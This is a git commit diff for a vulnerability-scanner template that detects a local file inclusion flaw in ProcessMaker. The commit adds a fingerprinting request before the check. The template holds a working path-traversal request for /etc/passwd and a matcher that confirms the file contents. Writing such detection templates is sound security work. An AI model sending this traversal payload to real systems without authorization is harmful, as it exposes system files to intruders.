Update processmaker-lfi.yaml

patch-1
Prince Chaddha 2023-11-06 16:44:30 +05:30 committed by GitHub
parent cbf05920f6
commit 6a3d9c4a13
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
1 changed files with 16 additions and 2 deletions

View File

@ -16,20 +16,34 @@ info:
max-request: 1 max-request: 1
tags: processmaker,lfi,edb tags: processmaker,lfi,edb
flow: http(1) && http(2)
http: http:
- method: GET
path:
- "{{BaseURL}}"
matchers:
- type: word
part: body
words:
- "ProcessMaker"
- "processmaker_login.png"
condition: and
- raw: - raw:
- | - |
GET /../../../..//etc/passwd HTTP/1.1 GET /../../../..//etc/passwd HTTP/1.1
Host: {{Hostname}} Host: {{Hostname}}
unsafe: true
matchers-condition: and matchers-condition: and
matchers: matchers:
- type: regex - type: regex
part: body
regex: regex:
- "root:.*:0:0:" - "root:.*:0:0:"
- type: status - type: status
status: status:
- 200 - 200
# digest: 4b0a00483046022100da555d18f71eb6881ca5964baad008dd99f39b49f214baf31cd330bddf25cb99022100a9861f6ed78d2af0a51e2d5ed11a77aaa793991c3843e3ff06560891a013f7e2:922c64590222798bb761d5b6d8e72950